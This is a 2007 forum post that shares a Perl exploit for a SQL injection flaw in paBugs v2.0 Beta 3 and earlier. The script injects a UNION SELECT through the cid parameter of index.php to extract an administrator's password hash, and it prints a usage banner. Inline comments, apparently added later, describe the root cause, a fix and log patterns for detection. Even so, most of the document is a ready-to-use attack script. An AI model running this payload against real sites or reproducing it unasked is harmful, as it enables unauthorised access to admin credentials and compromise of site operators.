paBugs <= v2.0 Beta 3 Sql-Injection exploit

Discussion in 'Уязвимости' started by p-range, 10 Jan 2007.

    Code:
    #!/usr/bin/perl
    use LWP::UserAgent;
    use HTTP::Cookies;
    
    # Require all four positional arguments; otherwise print the banner and stop.
    if(@ARGV < 4)
    {
    	usage();
    	exit();
    }
    
    # NOTE(review): none of these arguments is validated; each one is
    # interpolated verbatim into the request URL built below.
    $host = $ARGV[0]; # Host
    $path = $ARGV[1]; # Path to paBugs directory
    $pref = $ARGV[2]; # prefix for table admins
    $usid = $ARGV[3]; # user id
    
    # The user agent is created with default settings: no agent string, timeout
    # or cookie jar is configured. Unless overridden, LWP::UserAgent identifies
    # itself as libwww-perl in the User-Agent header, which is a useful log pivot.
    $www = new LWP::UserAgent;
    # The request puts a single quote followed by a UNION SELECT into the `cid`
    # query parameter of index.php and ends the value with a `/*` comment opener.
    # The backslashes only separate the variable names from the literal text.
    # Root cause (inferred from the payload shape; the application code is not
    # shown here): `cid` reaches a SQL statement without an integer cast or a
    # bound parameter. The fix on the application side is a prepared statement
    # or strict numeric validation of `cid`.
    # Detection: access-log entries for index.php whose `cid` value contains a
    # quote, `union`, `select` or a trailing `/*`.
    $sql = "$host$path\index.php?cid=1'+union+select+1,2,3,password,5+from+$pref\_admins+where+id=$usid/*";
    print "\n\n [~] Searching password hash for user with id=$usid \n";
    # LWP's get() returns an HTTP::Response object even when the request fails,
    # so this `or err()` is not expected to fire; the HTTP status is never checked.
    $res = $www -> get($sql) or err();
    # Takes the first run of 32 characters from the class [0-9,a-f] anywhere in
    # the response body. The class also admits a literal comma, and any unrelated
    # 32-character hex string on the page would match, so the printed value is
    # not by itself proof of disclosure.
    $res -> content() =~ /([0-9,a-f]{32})/ or err();
    # The script labels the capture as an MD5 hash. A site that stores admin
    # passwords as a bare 32-hex digest (presumably unsalted MD5; confirm against
    # the schema) should treat any exposure as a credential compromise: rotate
    # the passwords and move to a salted, slow password hash.
    print "\n [+] MD5 Hash for user with id=$usid is: $1 \n\n";
    
    # Print the usage banner to STDOUT, one line per print call.
    # Takes no arguments and returns the result of the final print.
    sub usage()
    {
        # Banner rows without their trailing newline; it is added on output.
        my @banner_rows = (
            '+---------------------------------------------------------+',
            '|                  .: Cold Fear Team :.                   |',
            '+---------------------------------------------------------+',
            '|    paBugs <= v2.0 Beta 3 Sql-Injection exploit          |',
            '| Usage: pabugs_cft.pl <site> <folder> <prefix> <user_id> |',
            '| e.g.: pabugs_cft.pl http://site.com / bt 1              |',
            '| Coded by p-range   // cf-team.net   // p-range.info     |',
            '+---------------------------------------------------------+',
        );
        print "$_\n" for @banner_rows;
    }
    
    # Report a negative result on STDOUT and terminate the script.
    # Note that exit() is called without a status, so the process exits with 0.
    sub err()
    {
        my $notice = "\n [-] Engine is NOT vulnerably";
        print $notice;
        exit();
    }
     
    #1 p-range, 10 Jan 2007
    Last edited: 11 Jan 2007